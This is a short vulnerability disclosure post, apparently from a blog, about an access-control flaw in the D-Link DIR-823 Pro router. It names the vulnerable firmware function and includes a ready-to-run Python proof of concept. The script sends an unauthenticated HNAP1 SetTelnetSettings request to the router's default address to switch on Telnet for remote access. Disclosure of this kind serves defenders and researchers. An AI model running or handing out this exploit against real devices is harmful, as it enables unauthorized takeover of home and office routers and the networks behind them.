D-Link 823_Pro Unauthorized Telnet access
未分类
D-Link 823_Pro Unauthorized Telnet access
未分类

D-Link 823_Pro Unauthorized Telnet access

Brand

D-Link

Firmware Link

https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-823%20Pro

Description

Dir-823_Pro There is improper permission control, allowing unauthorized users to turn on and access Telnet services, and attacks can be carried out remotely

Location of the vulnerability

In function sub_42A620 line 23,exec system function with telnet restart.
An attacker can enable the Telnet service by concatenating and calling the parameters of the setTelnetsetting request, allowing the attacker to remotely access the router.

POC

import requests
burp0_url = "http://192.168.0.1:80/HNAP1/"
burp0_headers = {"Accept": "application/json", "SOAPACTION": "\"http://purenetworks.com/HNAP1/SetTelnetSettings\"", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36", "Content-Type": "application/json", "Origin": "http://192.168.0.1", "Referer": "http://192.168.0.1/priv_mgt.html", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_json={"SetTelnetSettings": {"telnet_enabled": "1"}}
requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
Post Views: 199

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注